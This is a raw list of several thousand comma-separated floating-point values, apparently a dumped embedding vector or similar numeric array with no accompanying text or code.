0.0184959527105093, 0.039837438613176346, -0.00508712837472558, 0.0058837286196649075, 0.019800154492259026, 0.01942964270710945, -0.030796948820352554, 0.02719557285308838, 0.009655539877712727, -0.0020137319806963205, -0.004494308959692717, 0.007091597653925419, 0.005628075450658798, -0.011426586657762527, -0.013153172098100185, -0.017977235838770866, -0.02277906984090805, -0.02294209599494934, 0.019651951268315315, -0.05338335409760475, -0.01542811468243599, -0.0024620515760034323, -0.027743929997086525, -0.02629152312874794, 0.034146375954151154, -0.008277235552668571, -0.04300902038812637, -0.005161230452358723, -0.033553555607795715, 0.0007660333067178726, -0.02200840599834919, -0.018540414050221443, -0.013797862455248833, 0.0012439936399459839, -0.024661270901560783, 0.016584111377596855, 0.0015894960379227996, -0.017488161101937294, -0.012589993886649609, -0.005198281724005938, -0.013568145222961903, 0.01941482350230217, 0.0019229566678404808, 0.01017425674945116, -0.013182813301682472, -0.03198258578777313, 0.003819977631792426, 0.04250512272119522, 0.008684798143804073, -0.013116120360791683, -0.01913323439657688, -0.006020817905664444, -0.012560352683067322, -0.0299818217754364, 0.027091829106211662, -0.02566906251013279, 0.02325332537293434, 0.004523950163275003, 0.01032987143844366, 0.026854701340198517, 0.003794041695073247, -0.019370362162590027, -0.025921011343598366, 0.006124561652541161, -0.006984149105846882, -0.0007771486998535693, -0.02169717662036419, -0.000565030612051487, -0.015324371866881847, -0.007069366984069347, 0.03204186633229256, 0.03367212042212486, -0.005031551234424114, -0.017517801374197006, 0.022704968228936195, 0.009677770547568798, -0.0037069714162498713, -0.006865585222840309, -0.027417879551649094, -0.014064631424844265, 0.005876318551599979, -0.02768464758992195, -0.02061528153717518, -0.003632869105786085, -0.018866464495658875, -0.0047462573274970055, -0.017651185393333435, -0.014101682230830193, -0.0011800803476944566, 0.008744080550968647, -0.027566084638237953, -0.0297891553491354, 0.019444463774561882, -0.0006303333211690187, 0.029285259544849396, -0.0011726701632142067, 0.006057869177311659, -0.003645836841315031, 0.00565030612051487, -0.0015876434044912457, -0.024379681795835495, -0.017236212268471718, -0.009729642421007156, -0.007262032944709063, -0.019503746181726456, -0.030189309269189835, -0.02306065894663334, 0.00036101750447414815, -0.01436104066669941, -0.006280176341533661, 0.010337281972169876, -0.0032845877576619387, -0.008410619571805, 0.020052103325724602, -0.01605057530105114, -0.00503896176815033, -0.012175020761787891, -0.006939687766134739, -0.03817754611372948, 0.0003501337196212262, -0.03239756077528, -0.029463104903697968, 0.006150497123599052, -0.014198015443980694, 0.017058366909623146, 0.01622842065989971, 0.018155083060264587, 0.03396853059530258, -0.0198594368994236, 0.0035402411594986916, -0.017532622441649437, -0.011144997552037239, 0.01360519602894783, -0.004197899717837572, 0.03485775738954544, -0.030796948820352554, 0.014331399463117123, -0.0218453798443079, 0.024824297055602074, 0.018407030031085014, -0.003923720680177212, -0.01207868754863739, 0.003219748381525278, -0.01785867288708687, 0.011537740007042885, -0.044105734676122665, 0.030945152044296265, -0.012908633798360825, 0.025802448391914368, -0.01910359226167202, -0.04342399165034294, -0.03316822275519371, -0.02366829849779606, -0.034768834710121155, -0.041497331112623215, -0.01132284291088581, 0.03657693415880203, 0.055398937314748764, -0.016539650037884712, 0.016095036640763283, 0.0061690229922533035, 0.03227899596095085, -0.04659557342529297, -0.03085622936487198, -0.0024546412751078606, -0.015072423033416271, -0.015813447535037994, 0.024216657504439354, -0.023179223760962486, -0.012049046345055103, 0.013864554464817047, 0.022423379123210907, -0.006350573617964983, 0.007339840289205313, 0.014724141918122768, 0.009877846576273441, 0.008084569126367569, 0.017191750928759575, -0.03367212042212486, 0.017932774499058723, 0.03322750702500343, 0.02338670939207077, -0.00683964928612113, -0.009381361305713654, 0.007551032118499279, 0.006769252009689808, -0.009455462917685509, -0.023935068398714066, -0.029092593118548393, -0.06574363261461258, -0.02568388357758522, 0.0068174186162650585, 0.01230840478092432, -0.013101300224661827, -0.030144846066832542, 0.0004290990764275193, -0.00030034620431251824, -0.007669596001505852, -0.0012106476351618767, 0.03242719918489456, -0.016613753512501717, 0.020052103325724602, -0.002324962057173252, 0.0034476129803806543, 0.055132169276475906, -0.007169404998421669, 0.004394270945340395, 0.019029490649700165, 0.0017080598045140505, 0.010915280319750309, 0.02538747526705265, 0.024112913757562637, -0.01576898619532585, -0.01788831315934658, 0.03633980453014374, -0.001049474929459393, -0.01683606021106243, -0.014924218878149986, 0.011122766882181168, 0.01862933672964573, -0.0031864021439105272, 0.024853937327861786, -0.002365718362852931, -0.007728877943009138, 0.007221276871860027, 0.010211307555437088, 0.02553567849099636, -0.02274942956864834, -0.008054927922785282, -0.03144904971122742, -0.007506570778787136, -0.020511537790298462, -0.006558060180395842, -0.03453170880675316, 0.021815739572048187, -0.007450994104146957, -0.03841467201709747, 0.005880023818463087, 0.012886403128504753, 0.0044794888235628605, 0.01330137625336647, 0.006569175515323877, -0.02537265419960022, 0.00404969509691, -0.00939618144184351, -0.007154584396630526, -0.02306065894663334, -0.013960887677967548, -0.0016645246651023626, 0.06515081226825714, 0.0061060357838869095, 0.00269547407515347, -0.0017099123215302825, -0.005072307772934437, -0.020081743597984314, 0.0016080215573310852, 0.03562842309474945, 0.0031771394424140453, 0.0031326781027019024, 0.01336806919425726, 0.01459075789898634, -0.023342248052358627, -0.01636180467903614, -0.0013671888737007976, -0.03058946132659912, 0.016302522271871567, 0.010952331125736237, 0.0005678094457834959, 0.012404737994074821, -0.020822767168283463, 0.018436672165989876, 0.0180661603808403, -0.027566084638237953, 0.010796716436743736, -0.00726573821157217, -0.018273646011948586, -0.0008484722347930074, 0.0011106093879789114, -0.005705883260816336, -0.013886785134673119, -0.02199358493089676, 0.006009702570736408, 0.01482047513127327, -0.0019414823036640882, 0.005183461122214794, 0.0030530178919434547, -0.011182048358023167, 0.002550974255427718, -0.013286556117236614, -0.0047981287352740765, -0.013620017096400261, 0.011500689201056957, -0.014709321781992912, -0.004342399071902037, -0.029151875525712967, 0.02202322706580162, 0.014753783121705055, 0.0034939271863549948, -0.01572452485561371, -0.016435908153653145, -0.016006113961338997, 0.0020915395580232143, 0.009900077246129513, -0.0021952828392386436, 0.005913369823247194, -0.011760047636926174, 0.006739611271768808, 0.024883577600121498, -0.004953743889927864, 0.014657449908554554, 0.003603228135034442, 0.027536442503333092, 0.011997174471616745, -0.0018071717349812388, -0.014694501645863056, -0.015094654634594917, 0.02981879562139511, -0.007328724954277277, 0.02737341821193695, -0.01652483083307743, 0.0009128486854024231, 0.017814211547374725, -0.008647747337818146, -0.008321696892380714, 0.015709703788161278, -0.035569142550230026, 0.009588847868144512, 0.012575173750519753, -0.010618871077895164, -0.012019405141472816, 0.0069248671643435955, -0.02384614571928978, 0.010033462196588516, -0.02829228714108467, 0.0003783852735068649, 0.004034874495118856, -0.008818183094263077, 0.016169138252735138, 0.003073396161198616, -0.010107563808560371, -0.004086745902895927, 0.012071277014911175, 0.020244769752025604, -0.006120856385678053, -0.0016839765012264252, 0.0010781895834952593, 0.0058392672799527645, 0.00706566171720624, -0.009084951132535934, 0.011634073220193386, 0.006680329330265522, 0.02903331071138382, -0.010285410098731518, -0.010878228582441807, 0.005187166389077902, -0.04597311466932297, 0.01602093316614628, 0.009151643142104149, -0.00382368266582489, -0.03299037739634514, -0.004386860877275467, 0.016302522271871567, -0.025861728936433792, 0.00932207889854908, -0.0054576401598751545, -0.003923720680177212, -0.0007262033177539706, 0.016584111377596855, 0.005742934066802263, -0.031093357130885124, 0.0013329165522009134, 0.0011671124957501888, -0.017666006460785866, 0.008432850241661072, 0.00803269725292921, -0.0008447670843452215, -0.009077541530132294, 0.007402827497571707, 0.015605960972607136, -0.01512429490685463, -0.008262415416538715, 0.018303286284208298, -0.008477311581373215, 0.012271353974938393, -0.001279192278161645, -0.005231627728790045, -0.0073064942844212055, 0.011144997552037239, -0.004609168041497469, -0.01729549467563629, 0.022734608501195908, 0.01867379993200302, 0.02352009527385235, 0.018006877973675728, 0.020852409303188324, 0.006854469887912273, 0.01207868754863739, 0.0008410619921050966, -0.0023546030279248953, -0.02110435627400875, -0.006591406650841236, 0.014005349017679691, 0.01030764076858759, 0.021341484040021896, 0.0034476129803806543, -0.006898931227624416, 0.0012652981095016003, -0.005327960941940546, 0.016584111377596855, 0.0035346834920346737, 0.034324221312999725, -0.006695149932056665, 0.012604814022779465, 0.01940000243484974, 0.003045607591047883, 0.002964094979688525, -0.04191230610013008, 0.0006377435638569295, -0.020837588235735893, 0.008499542251229286, 0.002623224165290594, -0.016554471105337143, -0.006732200738042593, 0.030470898374915123, 0.017384417355060577, -0.005298319738358259, -0.048670440912246704, 0.0031252678018063307, 0.002328667091205716, -0.019148053601384163, 0.0234015304595232, -0.015635602176189423, 0.0098704369738698, 0.04449106752872467, 0.0031956650782376528, -0.01667303405702114, 0.007995646446943283, -0.015153936110436916, 0.03456134721636772, 0.010566999204456806, 0.036161959171295166, -0.007576968055218458, -0.03405745327472687, -0.013405120000243187, -0.0017867935821413994, 0.024246297776699066, 0.0075658527202904224, 0.007280558347702026, -0.010515127331018448, 0.005261268932372332, 0.002804775023832917, -0.00032188219483941793, -0.011463637463748455, 0.024883577600121498, -0.037703290581703186, 0.009203515015542507, -0.001052253763191402, -0.008203133009374142, 0.01124133076518774, -0.010411383584141731, -0.00046638183994218707, -0.02020030841231346, 0.01851077377796173, 0.010737434029579163, 0.0022675327491015196, 0.006150497123599052, -0.04360183700919151, 0.00516493571922183, 0.014872347004711628, -0.020244769752025604, 0.006272766273468733, -0.008766311220824718, -0.00006634478631895036, -0.007073071785271168, -0.0023194043897092342, 0.04054882004857063, 0.001612653024494648, 0.006724790669977665, 0.011196869425475597, 0.010878228582441807, -0.004286822397261858, 0.018407030031085014, -0.0030974794644862413, 0.0019340720027685165, 0.00046151888091117144, -0.0023990643676370382, 0.002356455661356449, 0.002854794031009078, -0.005276089068502188, -0.00004599557723850012, -0.003682888112962246, 0.00711382832378149, 0.006787777878344059, -0.028662798926234245, -0.00019822386093437672, 0.015961652621626854, 0.01522062812000513, 0.02523927018046379, 0.025031782686710358, 0.006669213995337486, 0.023119941353797913, -0.02046707645058632, -0.0028584992978721857, -0.00916646420955658, 0.04206050932407379, 0.0013292114017531276, 0.003831092966720462, 0.01972605288028717, -0.03313858434557915, 0.0005858719232492149, 0.004838885273784399, -0.007150879595428705, -0.009307258762419224, -0.042386557906866074, 0.0034087093081325293, -0.003923720680177212, 0.007410237565636635, 0.010337281972169876, 0.021326664835214615, -0.021608253940939903, 0.020363332703709602, 0.01775492914021015, 0.013849734328687191, -0.014079451560974121, 0.001958155306056142, 0.004561001434922218, -0.017028726637363434, -0.026395266875624657, 0.00382368266582489, 0.006091215182095766, -0.007388006895780563, 0.002441673306748271, -0.010315051302313805, -0.026098856702446938, 0.015605960972607136, -0.010752255097031593, -0.0007317609852179885, -0.005309435538947582, -0.009900077246129513, 0.012323224917054176, -0.001276413444429636, 0.003890374908223748, -0.005872613284736872, 0.011715585365891457, 0.020822767168283463, -0.012975325807929039, 0.02432039938867092, -0.011997174471616745, -0.011693354696035385, 0.011685945093631744, -0.012286174111068249, 0.022527122870087624, 0.007773339282721281, -0.0027603134512901306, 0.015309550799429417, 0.002593583194538951, 0.008773721754550934, 0.028010698035359383, 0.012886403128504753, 0.02875172160565853, -0.027477161958813667, -0.0012912339298054576, -0.01959266886115074, 0.0039978232234716415, 0.004175669047981501, -0.00592448515817523, -0.006728495936840773, 0.004579526837915182, -0.007684416603296995, 0.027758751064538956, 0.004209015052765608, -0.008217954076826572, -0.024513065814971924, 0.010641101747751236, -0.002814037725329399, 0.0018219922203570604, -0.011886021122336388, -0.02523927018046379, -0.004079335834830999, 0.015042782761156559, -0.0030567231588065624, 0.022660506889224052, 0.00580221600830555, -0.0017673417460173368, -0.0054131788201630116, -0.014924218878149986, -0.014850116334855556, -0.03364247828722, -0.001985943643376231, -0.02676577866077423, 0.0033234916627407074, -0.01725103333592415, 0.011871200986206532, 0.0100853331387043, 0.011982354335486889, 0.03198258578777313, -0.02065974287688732, -0.008892285637557507, -0.024083271622657776, 0.0038866696413606405, 0.013323607854545116, -0.009655539877712727, 0.017636366188526154, -0.0217268168926239, 0.02003728225827217, -0.0021637894678860903, -0.0016376625280827284, 0.010433614253997803, -0.004101566504687071, -0.011597022414207458, 0.014924218878149986, 0.004305348265916109, -0.03373140096664429, -0.016510009765625, 0.010189076885581017, -0.02660275250673294, -0.023594196885824203, -0.003875554306432605, 0.0040422845631837845, -0.028158903121948242, 0.011804508976638317, -0.0006206074031069875, 0.010737434029579163, 0.006850764621049166, 0.01369411963969469, 0.026172960177063942, 0.01015943568199873, -0.007161994930356741, 0.027758751064538956, -0.008907105773687363, -0.0077955699525773525, 0.0039348360151052475, -0.03393888846039772, -0.025016961619257927, -0.0018627485260367393, -0.010322460904717445, -0.005176051054149866, 0.012745608575642109, 0.013130941428244114, 0.028158903121948242, -0.027921775355935097, -0.0022971737198531628, 0.020555999130010605, -0.014561116695404053, 0.013405120000243187, -0.005150115117430687, -0.004835180006921291, -0.02291245572268963, 0.005257563665509224, 0.004112681839615107, 0.01926661841571331, -0.009285028092563152, 0.010885639116168022, 0.024394502863287926, -0.007006379775702953, 0.01957784779369831, -0.01759190484881401, 0.0116044320166111, -0.004457258153706789, 0.019814975559711456, 0.0355098582804203, 0.00044090914889238775, 0.0024601989425718784, -0.002821448026224971, -0.012604814022779465, 0.001945187454111874, -0.01848113350570202, -0.019800154492259026, 0.011048664338886738, -0.02397952973842621, 0.0034476129803806543, -0.03239756077528, -0.024201836436986923, 0.01634698361158371, -0.0024527886416763067, 0.02338670939207077, -0.015339192003011703, -0.006624752655625343, 0.02294209599494934, -0.01649518869817257, 0.043157223612070084, 0.006772957276552916, 0.03058946132659912, 0.004338694270700216, -0.014983500353991985, 0.001612653024494648, 0.0024657566100358963, 0.005064897704869509, 0.016717495396733284, -0.022112149745225906, -0.017532622441649437, -0.009173874743282795, 0.004179373849183321, 0.020511537790298462, 0.0004253939550835639, -0.00810679979622364, 0.001127282390370965, -0.01621359959244728, 0.013286556117236614, 0.019755693152546883, -0.005809626542031765, -0.0017728994134813547, 0.015591139905154705, -0.0035346834920346737, -0.0000903122709132731, 0.007699237205088139, 0.005894843954592943, -0.020970972254872322, 0.011900842189788818, 0.01775492914021015, -0.0026417498011142015, 0.006517304107546806, -0.0002827468852046877, 0.012901224195957184, 0.0047981287352740765, -0.01107089500874281, -0.006257945671677589, -0.006780367344617844, -0.0009434159146621823, 0.006739611271768808, -0.02033369243144989, 0.005805921275168657, -0.006094920448958874, 0.013931246474385262, -0.00047055009054020047, -0.007928954437375069, 0.0006627531256526709, -0.0053427815437316895, 0.010826357640326023, 0.013960887677967548, 0.002104507526382804, -0.006176433060318232, 0.009588847868144512, -0.018140261992812157, 0.02107471600174904, 0.005746639333665371, 0.045943472534418106, -0.002739935414865613, 0.012197251431643963, -0.01925179734826088, -0.006502483505755663, -0.01192307285964489, 0.02199358493089676, -0.007480634842067957, 0.028633158653974533, -0.010507716797292233, 0.012864172458648682, 0.011908251792192459, -0.026232240721583366, 0.006624752655625343, 0.0036754778120666742, 0.002549121854826808, -0.003193812444806099, 0.01398311834782362, -0.0029881782829761505, -0.012649275362491608, -0.032634686678647995, 0.01513911597430706, -0.0117007652297616, 0.040430255234241486, 0.003751432755962014, -0.003901490243151784, 0.022438200190663338, -0.010833767242729664, -0.024542707949876785, -0.00473514199256897, -0.009707411751151085, -0.016391444951295853, -0.003971887286752462, 0.026380445808172226, 0.012501071207225323, 0.020437436178326607, -0.021015433594584465, 0.0232088640332222, -0.013642247766256332, -0.004290527664124966, 0.017488161101937294, 0.022660506889224052, -0.005479870829731226, 0.016287703067064285, 0.00638021482154727, -0.009329489432275295, -0.013797862455248833, 0.019814975559711456, -0.014034990221261978, -0.003931131213903427, -0.012115738354623318, -0.0027955120895057917, -0.01238250732421875, 0.006491368170827627, -0.015487397089600563, 0.018436672165989876, -0.004779603332281113, -0.00165248301345855, -0.01741405948996544, -0.0018071717349812388, -0.005880023818463087, -0.007758518680930138, -0.01711764931678772, -0.0217268168926239, -0.00516493571922183, -0.016702676191926003, 0.013086480088531971, 0.019073951989412308, 0.030204128473997116, 0.02094133198261261, 0.004020053893327713, -0.02080794796347618, 0.013153172098100185, 0.008795952424407005, 0.011678534559905529, 0.015843087807297707, 0.01132284291088581, 0.020378153771162033, 0.0132198641076684, -0.011552560143172741, 0.019474104046821594, -0.0007966005359776318, 0.004464668221771717, -0.006787777878344059, 0.010944921523332596, -0.030974794179201126, -0.012115738354623318, -0.0008267046650871634, -0.0023379300255328417, -0.017162110656499863, -0.004546180833131075, 0.02678059972822666, -0.01153032947331667, 0.03453170880675316, -0.0007576968055218458, -0.02246784046292305, -0.0023935067001730204, 0.0014431438175961375, 0.009285028092563152, -0.001838665222749114, 0.005298319738358259, -0.01590237021446228, 0.002738082781434059, -0.0015978325391188264, -0.0010763370664790273, 0.008351338095963001, -0.021978765726089478, -0.005931895226240158, -0.002515775617212057, 0.010455845855176449, -0.00954438652843237, -0.0008799657225608826, 0.004664744716137648, -0.00169046048540622, 0.004920397885143757, 0.001008718623779714, -0.007891902700066566, -0.01959266886115074, 0.019800154492259026, 0.000053782114264322445, 0.009122002869844437, -0.03711047023534775, -0.0024583463091403246, 0.0005932821659371257, -0.030041104182600975, -0.0005974504165351391, -0.0035031898878514767, 0.0075732627883553505, 0.013138351030647755, 0.02218625135719776, 0.01618395932018757, -0.01941482350230217, 0.0009531418327242136, 0.0011207984061911702, 0.030796948820352554, -0.0018525593914091587, 0.026513829827308655, 0.0016330311773344874, 0.009729642421007156, 0.03527273237705231, -0.01926661841571331, 0.015265089459717274, -0.011641483753919601, 0.005024141166359186, 0.006365394219756126, -0.01101161353290081, 0.008840413764119148, -0.002562089590355754, 0.018584875389933586, -0.011330253444612026, 0.00035638612462207675, -0.010730024427175522, 0.003041902557015419, -0.002443525940179825, -0.01757708378136158, -0.0017163963057100773, 0.006898931227624416, 0.0063209328800439835, -0.009292437694966793, -0.024335220456123352, -0.005931895226240158, 0.014072041027247906, -0.0214155875146389, 0.012189840897917747, -0.0017728994134813547, 0.01938518136739731, 0.02735859714448452, -0.01619878038764, -0.016332164406776428, -0.010952331125736237, -0.005642896052449942, 0.009536975994706154, -0.0005066749872639775, -0.005943010561168194, -0.0017126911552622914, 0.01831810735166073, 0.007602903991937637, 0.003336459631100297, 0.016480369493365288, -0.019014669582247734, -0.0008966387831605971, 0.023638658225536346, -0.01131543330848217, -0.01819954439997673, 0.02673613838851452, -0.003957067150622606, 0.0022471544798463583, -0.0023527503944933414, -0.0009976032888516784, -0.014153554104268551, -0.014123912900686264, -0.004805539269000292, -0.026069216430187225, 0.010366922244429588, 0.013716350309550762, -0.006065279711037874, -0.002139706164598465, -0.01544293574988842, 0.0045943474397063255, -0.006450612097978592, 0.0027825443539768457, 0.0033253440633416176, -0.0043275789357721806, -0.0035050425212830305, -0.014464784413576126, -0.01070779375731945, -0.0005766091053374112, 0.000056213601055787876, -0.020674563944339752, -0.0013616312062367797, 0.00955179613083601, -0.000326745182974264, 0.016243241727352142, 0.005691062659025192, -0.007936364971101284, -0.00015920432633720338, 0.015976471826434135, -0.024364860728383064, -0.0061690229922533035, -0.008818183094263077, 0.007425058167427778, -0.013553325086832047, 0.006102330982685089, 0.023757221177220345, -0.024735374376177788, 0.009388770908117294, 0.010818947106599808, -0.010063102468848228, 0.003143793437629938, -0.003293850691989064, -0.01193048246204853, -0.007091597653925419, 0.0005168640636838973, -0.012026815675199032, 0.03055982105433941, -0.0057244086638092995, 0.005676242057234049, -0.020763486623764038, -0.029537208378314972, -0.02126738242805004, -0.014583347365260124, -0.016317343339323997, 0.016924982890486717, 0.01622842065989971, -0.0008475459180772305, 0.013975708745419979, -0.007273148279637098, -0.000026456864361534826, -0.010137205012142658, -0.002812185324728489, -0.029433464631438255, -0.014864936470985413, 0.010722613893449306, 0.025417115539312363, -0.004642514046281576, -0.010166846215724945, -0.0021471164654940367, -0.01683606021106243, 0.003901490243151784, 0.013034608215093613, 0.006046753842383623, 0.006454316899180412, 0.020763486623764038, 0.007250917609781027, -0.005331666208803654, 0.004635103512555361, 0.016272881999611855, 0.0014690796378999949, 0.004083041101694107, 0.0037384650204330683, 0.008781131356954575, 0.021949123591184616, 0.0012856762623414397, 0.021371126174926758, 0.006602521985769272, 0.009974179789423943, 0.0002473166969139129, 0.026795418933033943, 0.025639422237873077, -0.004642514046281576, -0.0030289345886558294, -0.028559057042002678, 0.0012532564578577876, -0.027936596423387527, 0.012189840897917747, 0.021193278953433037, 0.012708557769656181, 0.021578611806035042, -0.001844222890213132, -0.007988235913217068, -0.001657114364206791, -0.018688619136810303, 0.014472194015979767, 0.010129795409739017, -0.01359778642654419, 0.010248358361423016, 0.010411383584141731, 0.009914898313581944, -0.016687855124473572, -0.005353896878659725, 0.0018071717349812388, 0.00592448515817523, -0.015843087807297707, 0.017384417355060577, 0.00169046048540622, 0.008884875103831291, 0.010492896661162376, -0.01245660986751318, -0.02678059972822666, -0.0016719348495826125, -0.005294614937156439, 0.007584378123283386, 0.0024879872798919678, 0.00473514199256897, -0.003938541281968355, -0.012315815314650536, -0.004101566504687071, 0.01925179734826088, -0.0011421028757467866, -0.008284646086394787, 0.020748665556311607, 0.01682123914361, 0.0035587665624916553, -0.018436672165989876, 0.017636366188526154, -0.010848588310182095, -0.004898167215287685, 0.0005705882795155048, 0.014249887317419052, -0.007243507541716099, 0.005576204042881727, 0.02279389090836048, -0.0025065129157155752, 0.0036977087147533894, -0.005761459935456514, 0.01713247038424015, -0.0017895724158734083, -0.005957831162959337, -0.0024083273019641638, 0.034176018089056015, -0.016287703067064285, 0.0011995321838185191, -0.003308671060949564, -0.010685563087463379, -0.0004126576241105795, -0.0028677619993686676, -0.015783805400133133, 0.0035532088950276375, 0.002363865729421377, -0.010485486127436161, -0.007662185933440924, -0.01192307285964489, 0.021949123591184616, -0.0015255827456712723, 0.007121238391846418, 0.009425822645425797, 0.009900077246129513, -0.00638021482154727, -0.010848588310182095, 0.025150347501039505, -0.015605960972607136, 0.00405339989811182, -0.010366922244429588, 0.013212453573942184, -0.015102064236998558, 0.00011867958528455347, -0.019148053601384163, 0.0008345780079253018, 0.004246066324412823, -0.01124133076518774, -0.00012064793554600328, -0.01542811468243599, 0.006417265627533197, 0.0100853331387043, 0.01942964270710945, 0.04223835468292236, 0.0004969490692019463, -0.01536883320659399, 0.02171199582517147, -0.004698090720921755, -0.01038915291428566, -0.011974943801760674, -0.009277617558836937, -0.0009258165955543518, 0.021445227786898613, 0.020704204216599464, 0.021445227786898613, 0.009974179789423943, -0.019770514219999313, -0.015976471826434135, -0.00916646420955658, -0.017088009044528008, -0.011893431656062603, 0.013138351030647755, 0.000031638242944609374, -0.006802598014473915, -0.0067655472084879875, -0.00863292720168829, 0.017058366909623146, -0.02400917001068592, -0.008662567473948002, 0.0022971737198531628, 0.018688619136810303, -0.015783805400133133, -0.021356305107474327, -0.003905195277184248, -0.018718261271715164, -0.004134912509471178, 0.014368451200425625, -0.0002832100144587457, -0.01153032947331667, 0.008143851533532143, 0.00978151336312294, -0.0013255062513053417, -0.02581726759672165, 0.0007567705470137298, -0.004097861237823963, 0.006843354552984238, 0.004223835654556751, 0.006009702570736408, -0.022126968950033188, -0.002588025527074933, 0.006502483505755663, -0.003480959217995405, 0.007262032944709063, 0.005483576096594334, -0.006450612097978592, 0.017058366909623146, 0.000979077653028071, -0.02658793330192566, -0.0345020666718483, 0.00947028398513794, -0.000772054132539779, 0.01030764076858759, 0.013353248126804829, 0.004438732285052538, 0.024364860728383064, -0.011270971968770027, -0.025461576879024506, 0.002814037725329399, -0.0009424895979464054, -0.0197408739477396, -0.0011847116984426975, -0.0068174186162650585, 0.021623073145747185, 0.0053501916117966175, 0.0020563409198075533, -0.010137205012142658, 0.001919251517392695, -0.002450936008244753, -0.020259590819478035, -0.02274942956864834, 0.010574408806860447, 0.01819954439997673, 0.001164333545602858, 0.0002519480767659843, -0.018303286284208298, -0.022882813587784767, 0.00368659314699471, -0.0033531326334923506, -0.01536883320659399, 0.029477925971150398, -0.012286174111068249, 0.003006703918799758, -0.011589611880481243, -0.004179373849183321, 0.004912987817078829, 0.004716616123914719, -0.016761958599090576, 0.002473166910931468, -0.009114592336118221, 0.006143087055534124, -0.017488161101937294, -0.0024231476709246635, -0.01046325545758009, -0.0007896534516476095, 0.0037866313941776752, 0.011804508976638317, 0.002517628250643611, -0.006339458283036947, -0.002997441217303276, -0.0017163963057100773, 0.014309168793261051, 0.02491321973502636, 0.006498778238892555, 0.0218453798443079, -0.02231963537633419, 0.010063102468848228, 0.009388770908117294, 0.0038014519959688187, 0.003979297820478678, 0.030648743733763695, -0.008581055328249931, -0.011582201346755028, -0.011019023135304451, -0.003067838493734598, -0.005402063485234976, 0.00473514199256897, -0.005891139153391123, -0.011048664338886738, -0.010255768895149231, 0.008306876756250858, -0.0017553000943735242, 0.007339840289205313, -0.01848113350570202, 0.019622309133410454, -0.015605960972607136, 0.0042127203196287155, -0.005061192438006401, 0.03420565649867058, -0.00255838455632329, 0.011448817327618599, 0.006743316538631916, -0.001355147222056985, -0.002439820673316717, -0.007943774573504925, 0.012649275362491608, 0.01744369976222515, 0.011041253805160522, -0.006128266453742981, 0.017147289589047432, -0.031389765441417694, -0.0024250003043562174, -0.011760047636926174, -0.00397559255361557, 0.01184897031635046, -0.00848472211509943, 0.017680827528238297, -0.0039978232234716415, 0.005327960941940546, 0.014650040306150913, 0.027892135083675385, 0.0034994848538190126, -0.0032808827236294746, -0.009640718810260296, 0.0075250961817801, 0.007547327317297459, 0.003384626004844904, -0.01772528886795044, 0.033553555607795715, -0.01771046780049801, -0.003279030090197921, 0.0000693551919539459, 0.0018377389060333371, -0.0077881598845124245, -0.0028307107277214527, 0.0018525593914091587, 0.004316463600844145, -0.011278381571173668, -0.013175402767956257, 0.02397952973842621, 0.005327960941940546, 0.010492896661162376, -0.0031308254692703485, -0.0014440700178965926, -0.0008933967910706997, 0.003036344889551401, -0.01621359959244728, -0.013797862455248833, 0.003306818660348654, -0.023431170731782913, -0.005387242883443832, 0.0027269674465060234, 0.004216425120830536, 0.027743929997086525, 0.01000382099300623, -0.014931629411876202, -0.013768221251666546, -0.006198663730174303, -0.004972269292920828, -0.0012254680041223764, -0.0023379300255328417, -0.004946333821862936, -0.007554737385362387, -0.02171199582517147, -0.01132284291088581, -0.002602845896035433, 0.0011828591814264655, 0.004694385454058647, -0.03290145471692085, 0.012419558130204678, -0.035687703639268875, 0.010885639116168022, 0.020852409303188324, 0.009151643142104149, -0.003225306048989296, 0.01215279009193182, 0.01550221722573042, -0.015235449187457561, -0.0013412530533969402, -0.01213796902447939, 0.0098704369738698, -0.0021508214995265007, 0.013738580979406834, -0.0009661097428761423, 0.032486483454704285, -0.011152408085763454, -0.0005025067366659641, 0.002554679522290826, 0.016154319047927856, -0.020111385732889175, 0.0031456458382308483, 0.00032350319088436663, -0.011915662325918674, 0.01482047513127327, -0.016080215573310852, 0.006558060180395842, -0.006302407011389732, 0.011285792104899883, 0.007013789843767881, -0.0029992936179041862, -0.007899313233792782, -0.0035643242299556732, 0.008781131356954575, 0.022067688405513763, 0.0015996850561350584, 0.007884493097662926, 0.02245301939547062, 0.00608009984716773, 0.009003438986837864, 0.006439496763050556, 0.017517801374197006, 0.004690680652856827, 0.0034642862156033516, 0.007095302455127239, -0.010055692866444588, -0.00787708256393671, 0.0131605826318264, -0.009692590683698654, -0.009366540238261223, -0.013664478436112404, -0.004112681839615107, 0.01836256869137287, 0.008388388901948929, -0.011945303529500961, 0.02477983571588993, -0.004453552886843681, 0.004572116769850254, 0.010959741659462452, -0.015561499632894993, -0.00038718493306078017, -0.008692208677530289, -0.006309817545115948, 0.018421851098537445, -0.00435351487249136, 0.013686709105968475, 0.032664328813552856, -0.0008799657225608826, -0.01329396665096283, -0.0012291731545701623, -0.014383271336555481, -0.007973415777087212, -0.013731170445680618, -0.018762722611427307, -0.028811004012823105, -0.02292727492749691, 0.006031933706253767, 0.003960771951824427, -0.015472576022148132, 0.007802980486303568, -0.03013002686202526, 0.02292727492749691, 0.02642490714788437, -0.026721317321062088, 0.01177486777305603, 0.018718261271715164, -0.022082507610321045, -0.012493660673499107, -0.011389534920454025, 0.003151203505694866, 0.009225745685398579, 0.03024858981370926, -0.01053735800087452, -0.012271353974938393, 0.0020100269466638565, 0.003188254777342081, -0.011122766882181168, -0.01894056797027588, -0.006795187946408987, 0.007024905178695917, -0.0062134843319654465, -0.025639422237873077, -0.000013054755072516855, 0.019192514941096306, -0.0034846642520278692, -0.020852409303188324, 0.03456134721636772, -0.001574675552546978, -0.003008556552231312, -0.015398474410176277, 0.005976356565952301, -0.026217421516776085, -0.009522155858576298, 0.0016413676785305142, -0.013419940136373043, 0.005939305294305086, -0.017458520829677582, -0.004679565317928791, -0.02218625135719776, 0.014561116695404053, -0.009255386888980865, 0.0006233862368389964, -0.01911841332912445, -0.03548021987080574, -0.005094538442790508, 0.007280558347702026, -0.029225977137684822, -0.007339840289205313, -0.003008556552231312, -0.006747021339833736, -0.007914134301245213, -0.022690147161483765, -0.02291245572268963, -0.006672919262200594, -0.008321696892380714, 0.016480369493365288, -0.0035420935600996017, 0.0051278844475746155, 0.0019081361824646592, -0.00608009984716773, -0.0027251148130744696, 0.01161925308406353, -0.009803744032979012, -0.007943774573504925, 0.01971123181283474, 0.0011837854981422424, -0.0003823219449259341, -0.0025343012530356646, 0.021667534485459328, 0.012856762856245041, -0.002169347135350108, -0.004079335834830999, -0.018718261271715164, -0.01474637258797884, 0.011989764869213104, 0.00863292720168829, 0.015561499632894993, 0.0034735489170998335, 0.014168374240398407, 